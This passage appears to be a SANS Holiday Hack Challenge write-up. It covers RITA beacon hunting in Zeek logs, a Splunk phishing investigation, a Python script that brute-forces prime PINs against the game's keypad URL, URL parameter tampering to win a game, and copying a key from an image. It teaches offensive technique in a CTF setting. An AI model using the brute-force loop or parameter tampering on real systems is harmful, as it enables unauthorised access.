Right, so with that information in mind, let's go ahead and download the Zeek logs provided to us, and unzip them.

root@kali:~/HH/elf-zeeklogs# ls -la
total 309848
drwxr-xr-x 3 root root      4096 Dec 22 15:24 .
drwxr-xr-x 5 root root      4096 Dec 22 15:24 ..
drwxrwxrwx 3 root root     57344 Aug 24 09:43 elfu-zeeklogs
-rw-r--r-- 1 root root 317217612 Nov 20 15:07 elfu-zeeklogs.zip

Once unzipped, we see that we have a new directory containing all the logs needed for RITA. So let's go ahead and install RITA. If you're on Kali like me, you'll have to install it manually.

To start, we first need to install MongoDB, specifically a 3.6.x release, or otherwise RITA won't work.

Next, we need to install Go and install RITA from the GitHub repository.

root@kali:~/HH/elf-zeeklogs# sudo apt-get install go-dep
root@kali:~/HH/elf-zeeklogs# wget https://dl.google.com/go/go1.13.5.linux-amd64.tar.gz
root@kali:~/HH/elf-zeeklogs# tar -C /usr/local -xzf go1.13.5.linux-amd64.tar.gz 
root@kali:~/HH/elf-zeeklogs# export PATH=$PATH:/usr/local/go/bin
root@kali:~/HH/elf-zeeklogs# go version
go version go1.13.5 linux/amd64
root@kali:~/HH/elf-zeeklogs# go get github.com/activecm/rita
root@kali:~/HH/elf-zeeklogs# cd /root/go/src/github.com/activecm/rita
root@kali:~/go/src/github.com/activecm/rita# make install
root@kali:~/go/src/github.com/activecm/rita# mkdir /etc/rita && sudo chmod 755 /etc/rita
root@kali:~/go/src/github.com/activecm/rita# mkdir -p /var/lib/rita/logs && sudo chmod -R 755 /var/lib/rita
root@kali:~/go/src/github.com/activecm/rita# cp /root/go/src/github.com/activecm/rita/etc/rita.yaml /etc/rita/config.yaml && sudo chmod 666 /etc/rita/config.yaml

Once that's done, we need to start MongoDB, and then we can launch RITA.

root@kali:~/HH/elf-zeeklogs# service mongod start
root@kali:~/HH/elf-zeeklogs# rita 
NAME:
   rita - Look for evil needles in big haystacks.

USAGE:
   rita [global options] command [command options] [arguments...]

VERSION:
   v3.1.1

COMMANDS:
     delete, delete-database  Delete imported database(s)
     import                   Import bro logs into a target database
     html-report              Create an html report for an analyzed database
     show-beacons             Print hosts which show signs of C2 software
     show-bl-hostnames        Print blacklisted hostnames which received connections
     show-bl-source-ips       Print blacklisted IPs which initiated connections
     show-bl-dest-ips         Print blacklisted IPs which received connections
     list, show-databases     Print the databases currently stored
     show-exploded-dns        Print dns analysis. Exposes covert dns channels
     show-long-connections    Print long connections and relevant information
     show-strobes             Print strobe information
     show-useragents          Print user agent information
     test-config              Check the configuration file for validity
     help, h                  Shows a list of commands or help for one command

GLOBAL OPTIONS:
   --help, -h     show help
   --version, -v  print the version

Perfect, we got RITA working! Now just a side note: if you read the GitHub repository carefully, you should see an important note about the InternalSubnets setting.

With that in mind, go ahead and uncomment the InternalSubnets section in the config file, otherwise you might not see all the data you want. After you do that, we can then import all our logs into a new database called holiday_hack.

root@kali:~/HH/elf-zeeklogs# rita import elfu-zeeklogs/ holiday_hack

	[+] Importing [elfu-zeeklogs/]:
	[-] Verifying log files have not been previously parsed into the target dataset ... 
	[-] Parsing logs to: holiday_hack ... 
	[-] Parsing elfu-zeeklogs/conn.log-00001_20190823120021.log -> holiday_hack
	[-] Parsing elfu-zeeklogs/conn.log-00002_20190823121227.log -> holiday_hack
	[-] Parsing elfu-zeeklogs/conn.log-00003_20190823122444.log -> holiday_hack
	[-] Parsing elfu-zeeklogs/conn.log-00004_20190823123904.log -> holiday_hack
	[-] Parsing elfu-zeeklogs/conn.log-00005_20190823125418.log -> holiday_hack
	[-] Parsing elfu-zeeklogs/conn.log-00006_20190823130731.log -> holiday_hack
	[-] Parsing elfu-zeeklogs/conn.log-00007_20190823132006.log -> holiday_hack
	---snip---
           [-] Host Analysis:            41993 / 41993  [==================] 100 %
           [-] Uconn Analysis:           115915 / 115915  [==================] 100 %
           [-] Exploded DNS Analysis:    47836 / 47836  [==================] 100 %
           [-] Hostname Analysis:        47836 / 47836  [==================] 100 %
           [-] Beacon Analysis:          115915 / 115915  [==================] 100 %
           [-] UserAgent Analysis:       6 / 6  [==================] 100 %
	[!] No certificate data to analyze
	[-] Updating blacklisted peers ...
	[-] Indexing log entries ... 
	[-] Updating metadatabase ... 
[-] Done!

Awesome, the logs were imported successfully! Now we can start digging into the logs to find the "IP address of the malware-infected system". By malware, I'm assuming there must be some sort of C2 (Command and Control) server it's communicating with.

Thankfully, RITA has a show-beacons command that prints hosts which show signs of C2 software. So let's use that and see what we find!

root@kali:~/HH/elf-zeeklogs# rita show-beacons holiday_hack -H | less -S

+-------+-----------------+-----------------+-------------+-------------+-------------+------------+-----------+----------+-----------------+----------------+-------------
| SCORE |    SOURCE IP    | DESTINATION IP  | CONNECTIONS | AVG  BYTES  | INTVL RANGE | SIZE RANGE | TOP INTVL | TOP SIZE | TOP INTVL COUNT | TOP SIZE COUNT |  INTVL SKEW 
+-------+-----------------+-----------------+-------------+-------------+-------------+------------+-----------+----------+-----------------+----------------+-------------
| 0.998 | 192.168.134.130 | 144.202.46.214  |        7660 |        1156 |          10 |        683 |        10 |      563 |            6926 |           7641 |            0
| 0.847 | 192.168.134.131 | 150.254.186.145 |         684 |       13737 |        8741 |       2244 |         1 |      698 |              54 |            356 |            0
| 0.847 | 192.168.134.132 | 150.254.186.145 |         684 |       13634 |       37042 |       2563 |         1 |      697 |              58 |            373 |            0

We can see that 192.168.134.130 made 7,660 connections to 144.202.46.214, and this pair also has the highest beacon score (0.998).

Knowing that, we can navigate to the fifth objective in our badge and enter the IP of the infected host, "192.168.134.130" (the source of the beaconing, not the C2 destination), to complete the objective.
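To get a feel for why that pair stands out, here is a deliberately crude Python sketch of the beaconing idea: group Zeek conn.log entries by source and destination, count them, and check how regular the gaps between connections are. To be clear, this is NOT RITA's scoring algorithm, just a toy approximation; it assumes the usual Zeek TSV layout with a #fields header naming ts, id.orig_h and id.resp_h, and pair_stats is a name I made up.

```python
from collections import defaultdict
from statistics import pstdev


def pair_stats(conn_log_lines):
    """Return (pair, connection count, gap jitter) tuples, busiest pair first."""
    fields = []
    times = defaultdict(list)
    for line in conn_log_lines:
        line = line.rstrip("\n")
        if line.startswith("#fields"):
            # The header names the tab-separated columns that follow.
            fields = line.split("\t")[1:]
            continue
        if not line or line.startswith("#") or not fields:
            continue
        row = dict(zip(fields, line.split("\t")))
        times[(row["id.orig_h"], row["id.resp_h"])].append(float(row["ts"]))

    stats = []
    for pair, stamps in times.items():
        stamps.sort()
        gaps = [later - earlier for earlier, later in zip(stamps, stamps[1:])]
        # Low jitter means the host phones home on a steady timer.
        jitter = pstdev(gaps) if len(gaps) > 1 else None
        stats.append((pair, len(stamps), jitter))
    return sorted(stats, key=lambda item: item[1], reverse=True)
```

A pair with thousands of connections and near-zero jitter is the kind of traffic show-beacons is built to surface.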

Now that we have completed our 5 objectives, we can return to Santa and talk to him again.

After talking with Santa, we learn that he wants us to gain access to the steam tunnels, and complete the 6th and 7th objectives as well... so let's do just that!

Objective 6

Splunk

Once we talk to Santa, we look at Objective 6 and learn that we need to access https://splunk.elfu.org/ and figure out what was the message for Kent that the adversary embedded in their attack.

We also learn that if we need hints on achieving this objective, we should go visit the Laboratory in Hermey Hall and talk with Prof. Banas.

So right away, let’s go to the Laboratory and talk with the Professor.

Alright, so it seems the professor's computer has been hacking other computers on campus, and we need to figure out why! The professor also provides us a username and password to access the Splunk instance.

Upon logging into the splunk instance, we are greeted with the following information.

Okay, so our initial goal here is to answer the "Challenge Question", which we should see on the right-hand side of the Splunk screen. We also have training questions that we can answer, as they will help us get closer to answering the final question.

With this in mind, and since this is a learning experience, we will go through all the training questions and then answer the final challenge question.

Upon closing that message, we should see the following screen. To the left we have our chat, and to the right we have our question.

We see that our first training question is "What is the short host name of Professor Banas' computer?". If we look into the chat with Alice, she gives us a little hint as to where we can find that answer.

At the same time, she also gives us two links for the Splunk Search and access to the Raw File Archive as we will need them for the final answer.

With that in our pocket, let's go check out the #ELFU SOC chat to see if we can learn more and answer our first question.

After reading the chat, we see that a system called "sweetums" is communicating with a weird IP. We also learn that the system is Professor Banas' system, which is the answer to our first question!

After answering the question, we get access to our second question: "What is the name of the sensitive file that was likely accessed and copied by the attacker?"

If we look back into the chat with Alice, we should see her providing us a search query that searches for events that contain the professor's name.

The splunk search query looks something like so: index=main cbanas.

We also learn that the adversaries are trying to get to Santa by constantly trying to attack him and that they may have found some of Santa's sensitive data. So, using the search query provided to us, let's change the username from cbanas to santa to look for any events associated with Santa's account.

After running the query, right away we can see a PowerShell operation that interacted with a file called C:\Users\cbanas\Documents\Naughty_and_Nice_2019_draft.txt, which is the answer to our second question!

After answering the 2nd question, we get access to the 3rd one: "What is the fully-qualified domain name (FQDN) of the command and control (C2) server?"

Looking back into the chat with Alice we see some more hints and tips from her on how to find the answer for the question.

Alice tells us that we need to use Microsoft Sysmon data to answer this question, and provides us some background on Sysmon if we need it.

Alice also explains that in Sysmon, Event Code 3 represents that a network connection occurred. Along with that, she also provides us a splunk query that will look through sysmon logs for any powershell activity with the event code of 3.

With this information, we can enter the query in Splunk, and then look at the "dest" field in the "Interesting Fields" section to see if we can spot the malicious IP.

Upon investigating all the destinations returned by the query, we see that network connections were made to 144.202.46.214.vultr.com over 158 times, and this would be the answer to our 3rd question!

After answering the 3rd question, we now get access to our 4th training question: "What document is involved with launching the malicious PowerShell code?"

Once again, let's go back and chat with Alice to see what she has to say about this.

If we scroll up a little in the chat, Alice explains to us that we can use the reverse pipe option in splunk to sort all the events, with the oldest one being first. To sort on the oldest powershell operational logs, the query would look like so:

index=main sourcetype="WinEventLog:Microsoft-Windows-Powershell/Operational" | reverse

Alice then tells us that we can use the Time column to specify a time window. For this case we will be accepting the default +/- five second window from the oldest event. So let's go ahead and do that.

Once we have that filter in place, we now need to find out what document launched the PowerShell code. Alice also gives us another hint by explaining that in Sysmon, Event ID 1 is logged when a new process is created.

In case we don't have that, we can look for Windows Event ID 4688, which documents each program that is executed, who the program ran as, and the parent process that started the child process.

So with that information, let's create a simple query that will look for Event ID 4688 in the Windows Event Logs.

Upon executing the query, we see that we have a total of 156 events within the time window that we filtered for previously. Looking at the events, we can see a process creation of WINWORD.exe, which is Microsoft Word.

Looking into the "Process Command Line" we see that Word opened a new document from a zip folder, called 19th Century Holiday Cheer Assignment.docm, by using the /n switch. That would be our answer for the 4th question!

After answering the 4th question, we now get access to our 5th training question: "How many unique email addresses were used to send Holiday Cheer essays to Professor Banas?"

As before, we go back to Alice so we can chat with her and see what she's got for us.

Upon talking with Alice again, we learn a little bit about stoQ. We learn that stoQ is an automation framework that can be used to analyze all email messages. Alice also provides us a link to the stoQ project home page, and provides a link to slides from a talk on stoQ from the SANS DFIR Summit a few years back.

Alice then goes on to state that stoQ output is in JSON format, and is stored in their splunk logs. She also provides us the following splunk query that we can use to search through the stoQ data.

index=main sourcetype=stoq | table _time results{}.workers.smtp.to results{}.workers.smtp.from  results{}.workers.smtp.subject results{}.workers.smtp.body | sort - _time

Furthermore, we are told to check out strange-looking field names like results{}.workers.smtp.subject which should help us look for email subject names.

Alice also gives us a hint on where to look by stating that all of Professor Banas' homework submissions were sent to him via email with the subject "Holiday Cheer Assignment Submission".

With this information at hand, let's build a stoQ Splunk query that will filter out all emails except those with the subject from above. Overall, our query should look like so.

Once the query is executed, we can see that a total of 21 unique email addresses were used to send in the homework, which would be the answer to our 5th question!

After answering the 5th question, we now get access to our 6th training question: "What was the password for the zip archive that contained the suspicious file?"

You know the drill everyone, back to Alice we go!

One thing really stands out during this conversation with Alice: she mentions that the attacker used MITRE ATT&CK technique T1193, which is Spearphishing Attachment.

In the case of this Spearphishing attack, the target was Professor Banas, and it was successful unfortunately.

So using our previous stoQ splunk query, if we look at the first email we notice something very suspicious from Bradly Buttercups.

Having someone enable editing and enable content is a sure indicator that malware was included in the document! We can also see that the password for the zip file, which protected the malicious document from any email filters, was 123456789. That is the answer to our question!

After answering the 6th question, we now get access to our 7th and final training question: "What email address did the suspicious file come from?"

Well this answer is easy, let's just look back at our Splunk query where we found the password, and we should see the email in the results{}.workers.smtp.from field.

The answer - [email protected].

Now that we have answered all the training questions and gotten more comfortable with Splunk, let's go talk to Alice again to see what hints she has for the challenge question.

Alice first starts by telling us that the message we need to find seems to be embedded in the properties of the malicious document. She also provides a stoQ splunk query that allows us to search for all raw artifacts and their entities in a file by using the following query:

index=main sourcetype=stoq  "results{}.workers.smtp.from"="bradly buttercups <[email protected]>"

The only problem with this is that there are a ton of results within the JSON events. Thankfully Alice gives us some more splunk commands that will help us evaluate all the results, and provide us with a file name, and full path name which we can then use in our file archive to dig for the property data.

The splunk query when combined will look like so, and provide us the following output.

Alright, now that we have all these files and their locations in the archive... where do we look? Well I'm glad you asked! If you actually took a few minutes to do some Googling, you would have come across a blog post from Microsoft on Managing Metadata with Document Information Panels.

If we dig through that post, we should see the following:

Standard document properties can be maintained through the Document Properties view of the Document Information Panel. To see where these properties are actually stored in the OpenXML package, open the .rels file in the _rels folder of the unzipped Office document. As you can see in Figure 4, this file shows that standard document properties (core properties) are stored in the core.xml file within the docProps folder. The core.xml file contains all of the standard document properties that are populated from the Document Properties view in the Document Information Panel.

So, it seems that the core.xml file is what we need to look into for properties and metadata! Let’s download that file from the archive, rename it to “core.xml”, and open it up to read its contents.

Right away, within the description section of the XML file, we see the comment!
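If you would rather not read the XML by eye, the description can also be pulled out with a few lines of Python. This is only a minimal sketch: the two namespace URIs are the standard ones for OpenXML core properties, but the SAMPLE document and the read_description helper are made up for illustration and are not the real challenge file.

```python
import xml.etree.ElementTree as ET

# Namespaces used by OpenXML core properties (docProps/core.xml)
NS = {
    "cp": "http://schemas.openxmlformats.org/package/2006/metadata/core-properties",
    "dc": "http://purl.org/dc/elements/1.1/",
}

def read_description(core_xml):
    """Return the text of <dc:description>, or None if it is absent."""
    root = ET.fromstring(core_xml)
    node = root.find("dc:description", NS)
    return node.text if node is not None else None

# Hypothetical stand-in for the downloaded core.xml (NOT the challenge file)
SAMPLE = b"""<?xml version="1.0" encoding="UTF-8"?>
<cp:coreProperties
    xmlns:cp="http://schemas.openxmlformats.org/package/2006/metadata/core-properties"
    xmlns:dc="http://purl.org/dc/elements/1.1/">
  <dc:title>Example</dc:title>
  <dc:description>placeholder comment</dc:description>
</cp:coreProperties>"""

print(read_description(SAMPLE))
```

To use it on the real file, read the bytes of the downloaded core.xml and pass them to read_description instead of SAMPLE.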

Once we know that, we can navigate to the 6th objective in our badge and enter the message to complete the objective!

Objective 7

Frosty Keypad

With the completion of our 6th objective, we now need to gain access to the steam tunnels just as Santa told us. If we look into Objective 7 it tells us that for hints, we should visit Minty’s dorm room and talk with Minty Candycane.

On the map the Dormitory is on the right side. From Professor Banas we exit into the Quad, go right, and we should meet Tangle Coalbox, standing next to some sort of keypad.

Upon talking with Tangle, we learn that the keypad lock has been popped by someone and that we need to open it up for Tangle. He also provides us some hints on how to complete this challenge.

Upon accessing the keypad we are presented with the following:

Right away we notice something very interesting. The numbers 1, 3, and 7, along with the enter button, seem to be more worn out than the other keys. For those who have never done any physical security engagements, or have never played around with lock cracking, worn-out numbers on a keypad usually mean that those numbers are part of the security code needed to open the door. This directly relates to hint #3 provided to us by Tangle.

Tangle also provides us the following two other hints:

  1. One digit is repeated once.
  2. The code is a prime number.

For those that don’t know what a prime number is, it’s simply a number greater than 1 that is only divisible by 1 and itself. For example, 13 is a prime number because no number other than 1 and 13 divides it evenly.

So with this information, I’m assuming that the code is going to be 4 digits long, with one of the numbers being used twice, and the number being a prime (again, only divisible by 1 or itself). Since there can be a lot of combinations, let’s write a quick Python script that will generate a 4-digit prime number using 1, 3, and 7, and then will send the code to the keypad.

Let’s start by making a simple prime number generator:

#!/usr/bin/python3
import math

count = 3
while True:
    isPrime = True
    for x in range(2, int(math.sqrt(count) + 1)):
        if count % x == 0: 
            isPrime = False
            break
    if isPrime:
        print(count)
    count += 1

From the top, let’s explain what this script does.

Since 1 is not a prime number, we start counting at 3 (2 is skipped, which is fine since our pin is four digits long) and set the isPrime variable to True. We then divide count by every x from 2 up to its square root using the modulus operator. If any division leaves no remainder, then count is not a prime number, so we set isPrime to False and break out of the inner loop. If no divisor is found, we print the number since it is a prime.

If we run the script for a few seconds, we should see some valid prime numbers:

root@kali:~/HH/frosty_keypad# python3 code_breaker.py 
3
5
7
11
13
17
19
23

Awesome, so we got the prime number generator to work. The only issue is that we start from 3 and work our way up, while the pin code is a 4-digit prime number using 1, 3, and 7. So what we have to do is write some code that generates only numbers made of those three digits, with exactly one digit used twice.

So valid pins can be 1137, 1337, or 1377. Pins like 1113 and 1333 are not valid as they reuse one number more than once.

To do that, we will use something called combinatorics which is an area of mathematics primarily concerned with counting, both as a means and an end in obtaining results, and certain properties of finite structures.
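Before generating anything, a quick counting argument tells us how many candidates to expect: pick which of the three digits is doubled (3 ways), then arrange four symbols of which two are identical (4!/2! = 12 ways). The sketch below, which is my own sanity check rather than part of the original script, compares that formula against a brute-force count.

```python
from itertools import product
from math import factorial

digits = (1, 3, 7)

# Brute force: keep 4-digit tuples in which every worn digit appears at least once
brute_force = [p for p in product(digits, repeat=4) if set(p) == set(digits)]

# Counting argument: choose the doubled digit (3 ways), then arrange
# 4 symbols where two are identical (4! / 2! = 12 ways)
by_formula = len(digits) * factorial(4) // factorial(2)

print(len(brute_force), by_formula)
```

Both numbers come out to 36, so the search space is tiny even before the prime filter is applied.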

The python script used to generate our 4-digit pin number using only our three valid digits will look like so.

from itertools import product

valid_digits = [1,3,7]

def generate(valid_numbers):
    from itertools import product
    possible_digits = len(valid_numbers)
    for raw in product(valid_numbers, repeat=4):
        if len(set(raw)) == possible_digits:
            yield raw


for nums in generate(valid_digits):
    print(''.join(map(str, nums)))

Let’s quickly go over what this script does.

First, we start by defining a list called valid_digits which contains the numbers we want to use in generating our pin. We then define a new function called generate and pass our list into it as valid_numbers.

Next, we import product from itertools. This tool computes the cartesian product of input iterables. A cartesian product, in simple terms, takes two sets, A and B, and returns another set of tuples or “pairs.”

The cartesian product is just taking every possible combination of the elements of A and B and expressing them as a set of tuples (paired values). This is great for us because with repeat=4 it takes the product of our digit list with itself four times, so digits are automatically reused, allowing us to use that hint from Tangle.
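To make the cartesian product a bit more concrete, here is a tiny illustration using a two-digit list so the output stays readable. The variable names are just for this example.

```python
from itertools import product

# Every ordered pair that can be built from the digits 1 and 3
pairs = list(product([1, 3], repeat=2))
print(pairs)

# With our three digits and four positions there are 3**4 raw combinations
raw_count = len(list(product([1, 3, 7], repeat=4)))
print(raw_count)
```

The first print shows the four pairs (1, 1), (1, 3), (3, 1), and (3, 3); the second shows that our script starts from 81 raw combinations before any filtering.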

From there, we get the number of possible digits (3) and store it in the possible_digits variable. Finally, we use product with repeat=4 to generate every possible 4-digit sequence, and we keep only the sequences whose set of distinct digits has a length of 3. This filter guarantees that 1, 3, and 7 all appear, which in a 4-digit pin means exactly one digit is doubled. Each match is then yielded back to us.

Simply put, yield is used when we want to iterate over a sequence but don’t want to store the entire sequence in memory; the values are produced one at a time as we ask for them.

Finally, we call our function with our valid_digits list and print the value back to the screen. Since the value being returned is a tuple, we call the map function to convert each value in the tuple to a string, and finally we use join to join all those digits into a single 4-digit pin.

If we execute this code, we should see something like so:

root@kali:~/HH/frosty_keypad# python3 code_breaker.py 
1137
1173
1317
1337
1371
---snip---

As you can see, only 1 digit is repeated once, and not multiple times!

Perfect! So now let’s combine these two together to generate the pin, and validate if it is a prime number.

Combined, the code should look like so:

#!/usr/bin/python3

import math
from itertools import product

valid_digits = [1,3,7]

def generate(valid_numbers):
    from itertools import product
    possible_digits = len(valid_numbers)
    for raw in product(valid_numbers, repeat=4):
        if len(set(raw)) == possible_digits:
            yield raw

for nums in generate(valid_digits):
    pin = ''.join(map(str, nums))
    # Assume each candidate is prime until a divisor is found
    isPrime = True
    for x in range(2, int(math.sqrt(int(pin)) + 1)):
        if int(pin) % x == 0:
            isPrime = False
            break
    # Print only after every possible divisor has been ruled out
    if isPrime:
        print(pin)

Running the code, we get the following output:

root@kali:~/HH/frosty_keypad# python3 code_breaker.py 
1373
1733
3137
3371
7331

Perfect, so using some awesome math and some Python magic, we generated all the valid pin codes that are 4 digits long, use only one digit twice, and are prime numbers. That leaves us with just five candidates.

Alright, with that, we now need to submit the values to the pin pad and validate which one of these is the correct pin. We can simply use our developer console in our browser to check the network traffic so we can grab the URL where we will need to submit the pin.

With that information in hand, let’s finalize our Python code to submit all values to the pin pad, and print only the one that returns a success code of True.

#!/usr/bin/python3

import math
import json
import urllib.request
from itertools import product

valid_digits = [1,3,7]

def generate(valid_numbers):
    from itertools import product
    possible_digits = len(valid_numbers)
    for raw in product(valid_numbers, repeat=4):
        if len(set(raw)) == possible_digits:
            yield raw

def validate(possible_pin):
	response = urllib.request.urlopen('https://keypad.elfu.org/checkpass.php?i=' + possible_pin + '&resourceId=41e5c834-b3e2-487d-8f57-f65f37ad9059')
	data = json.loads(response.read().decode('utf-8'))
	if data['success'] == True:
		print("Valid Pin Found: " + possible_pin)


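for nums in generate(valid_digits):
    pin = ''.join(map(str, nums))
    # Assume each candidate is prime until a divisor is found
    isPrime = True
    for x in range(2, int(math.sqrt(int(pin)) + 1)):
        if int(pin) % x == 0:
            isPrime = False
            break
    # Submit the pin only after every possible divisor has been ruled out
    if isPrime:
        validate(pin)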

This code should be pretty self-explanatory, but let’s briefly go over it for those who are having trouble understanding it.

I create another function called validate and pass in our pin code as the variable possible_pin. From there we create a new variable called response which will contain the response from the web server.

We then decode the response body as UTF-8, parse it as JSON, and check if the success key in the JSON response is equal to True. If it is, we print the correct pin code to the screen.
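If you want the request logic to be a little more defensive, the URL building and the response check can be split into two small helpers. This is only a sketch under assumptions: the endpoint, the i parameter, and the resourceId value are copied from the script above, while build_url, is_success, and the sample response bodies are hypothetical names and data I made up for illustration.

```python
import json
from urllib.parse import urlencode

BASE_URL = "https://keypad.elfu.org/checkpass.php"
RESOURCE_ID = "41e5c834-b3e2-487d-8f57-f65f37ad9059"

def build_url(pin):
    """Build the check URL with properly encoded query parameters."""
    return BASE_URL + "?" + urlencode({"i": pin, "resourceId": RESOURCE_ID})

def is_success(body):
    """Return True only if the body is a JSON object with success set to true."""
    try:
        return json.loads(body).get("success") is True
    except (ValueError, AttributeError):
        # Not valid JSON, or valid JSON that is not an object
        return False

print(build_url("7331"))
print(is_success('{"success": true}'))   # hypothetical response body
print(is_success("<html>error</html>"))  # hypothetical non-JSON reply
```

Inside validate, the body passed to is_success would be response.read().decode('utf-8'), so an unexpected HTML error page no longer crashes the loop.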

So, let’s run the script. Upon running it, we get the valid pin code!

root@kali:~/HH/frosty_keypad# python3 code_breaker.py 
Valid Pin Found: 7331

Awesome, let’s test this on the pin pad in game and see if it works!

And there we have it, we unlocked the door and can enter the dorms!

Holiday Hack Trail

Upon entering the dorms and going to the right, we meet Minty Candycane!

After talking with Minty, we learn that she loves old games, and she tells us that we should give it a go! She also explains that if we get stuck, we should check out this year’s talk - which would be Chris Elgee’s talk, Web Apps: A Trailhead.

In the video, Chris talks about basic web application hacking and value manipulation, which can lead to issues in an application if the values passed back to the server are not validated; simple web app stuff!

So with that knowledge, let’s access the terminal and see what we have to work with.

Ahh cool, so this seems to be a remake of an old game known as Oregon Trail. We have three modes to choose from, and I like to make life easy, so we will choose easy mode.

Upon selecting that mode, we are presented with the following screen.

From the initial screen we can see that this allows us to purchase supplies needed for the game. At the bottom of the screen it also tells us what each supply does. It seems the more reindeer we have, the faster we go, and of course we need food and medication.

Okay, well I want to save my money, so let’s press BUY to continue and see what we get.

This screen now brings us to the game. We can do multiple things such as take medication, hunt, trade, or continue with our trail to the North Pole. It also lists a display of our inventory, and health conditions for our players.

Now, if we inspect the screen, I notice something odd. Let’s take a look at our URL.

Having some web application security background, and having watched Chris’ video, I think this smells like Web Parameter Tampering. For those who don’t know what that is, it’s simply an attack that is based on the manipulation of parameters exchanged between client and server in order to modify application data, such as user credentials and permissions, price and quantity of products, etc.

Since the parameters for our game are in the URL, we can simply modify them and see if it affects our game in some way, shape, or form.

So, to test this, let’s change our reindeer parameter value from 2 to 125.
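The same edit can be scripted, which is handy when there are many parameters to change. The sketch below rewrites query parameters with Python's urllib.parse. Note that the example URL and its parameter layout are hypothetical placeholders, not the game's real address; only the idea of a reindeer parameter comes from the game.

```python
from urllib.parse import urlsplit, urlunsplit, parse_qsl, urlencode

def tamper(url, **changes):
    """Return the URL with the given query parameters overwritten."""
    parts = urlsplit(url)
    params = dict(parse_qsl(parts.query, keep_blank_values=True))
    params.update({key: str(value) for key, value in changes.items()})
    return urlunsplit(parts._replace(query=urlencode(params)))

# Hypothetical URL for illustration only
example = "https://game.example/trail/?difficulty=0&distance=0&reindeer=2"
print(tamper(example, reindeer=125))
```

Running it prints the same URL with reindeer=125, ready to be pasted back into the browser.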

Once done, let’s press [ENTER] or the arrow by the URL and see what happens.

Hey, look at that! Our reindeer parameter changed in game and we now have 125 of them! Okay, but hold on, just because we changed the URL parameter, it doesn’t mean that the server holds the same value.

So let’s manipulate some more parameters of your choosing and then press GO and see if the value still holds.

Awesome, it works! The values hold, we are now on day 2 and have 7912 left for our distance. We traveled a total of 88 miles or whatever, but I don’t want to keep clicking GO till we get to the end. So, let’s change that distance to 8000 as it was the original “remaining” amount in the URL and press [ENTER].

Once the value is updated, let’s press GO and see what we get.

And there we have it! We completed the game by cheating! ;)

Key Cutting

Upon successfully completing the Holiday Hack Trail, we can talk to Minty again for more hints that will allow us to complete the next part of our objective.

From Minty, we learn about a key grinder in her room, as well as about someone hopping around campus with a key which we can copy… hmmm.

Minty also gives us a hint to watch Deviant’s talk on Optical Decoding of Keys.

Well, with that in mind, let’s keep going right and enter Minty’s room. Upon entering Minty’s room we spot a very shady character with no name! But hold on, look! He has a key on him!

If we’re quick and sneaky, we can use our browser’s dev tools to inspect the character image. Upon selecting the character and inspecting the image we see that it’s Krampus!

Following the background URL, we see the image of Krampus and we also get a better view of the key!

Let’s zoom in on that key to get a better picture of it!

With that key in hand, we see that there is a machine on Minty’s desk. Clicking on it takes us to the following screen.

So this is a bitting machine which aids in cutting and programming keys of any type. If you watched Deviant’s talk then you should know a lot about this and how to use it!

Each “bite” for the key can range from 0 to 9, with 9 being a deeper “bite” or cut. If we inspect the key we got from Krampus we can see that the bitting seems to be 1, 2, 2, 5, 2, 0 (this took some guessing and playing around with the machine).

If we enter that in the machine, we get the following key.

So, let’s save that image of the key we created for later purposes.

In Minty’s room we see another door. If we enter it, we see a closet with what seems to be a keyhole.

If we click on the keyhole, we are presented with a lock and a key ring. Click on the key ring to upload our generated key, and let’s try to open the lock!

After opening the door successfully, we get access to a secret tunnel!

Get Access To The Steam Tunnels

With access to the new secret tunnel from Minty’s closet, we enter the tunnel and come across a “Danger Keep Out” sign.

We’re not scared, so let’s keep moving down the tunnel. At the end of the tunnel we come across our shady character, Krampus Hollyfeld!

Upon talking to Krampus we learn that he maintains the steam tunnels underneath Elf U. We also learn that if we can help Krampus solve objective 8 then he will tell us more of what’s going on with the turtle doves and the scraps of paper we found!

Well, at least now we know who took the doves. So with that information, we can navigate to the seventh objective in our badge and enter the name “Krampus Hollyfeld” to complete the objective.

Objective 8

NyanShell - CranPi

Upon successfully gaining access to the steam tunnels and talking with Krampus, we learn that we need to help Krampus finish objective eight.

If we read the objective, we learn that for hints we can talk to Alabaster Snowball in the Speaker Unpreparedness Room.

So, from the tunnels, let’s go back to Hermey Hall, and access the room. There we will find Alabaster!

Talking to Alabaster we figure out what the challenge consists of, and of course we also get a couple of hints to help in completing the CranPi challenge.

It seems that something has gone horribly wrong with his terminal. Each time he logs into his account, he gets a toaster party? Overall it seems to be a shell issue, but Alabaster can’t overwrite it. Alabaster also gives us a hint by stating that “on Linux, a user’s shell is determined by the contents of /etc/passwd”.

Alright, with that in mind, let’s access the terminal!

  
β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘
β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘
β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–„β–€β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–„β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–€β–„β–‘β–‘β–‘β–‘β–‘β–‘β–‘
β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–ˆβ–‘β–‘β–„β–‘β–‘β–‘β–‘β–„β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–ˆβ–‘β–‘β–‘β–‘β–‘β–‘β–‘
β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–ˆβ–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–„β–ˆβ–„β–„β–‘β–‘β–„β–‘β–‘β–‘β–ˆβ–‘β–„β–„β–„β–‘β–‘β–‘
β–‘β–„β–„β–„β–„β–„β–‘β–‘β–ˆβ–‘β–‘β–‘β–‘β–‘β–‘β–€β–‘β–‘β–‘β–‘β–€β–ˆβ–‘β–‘β–€β–„β–‘β–‘β–‘β–‘β–‘β–ˆβ–€β–€β–‘β–ˆβ–ˆβ–‘β–‘
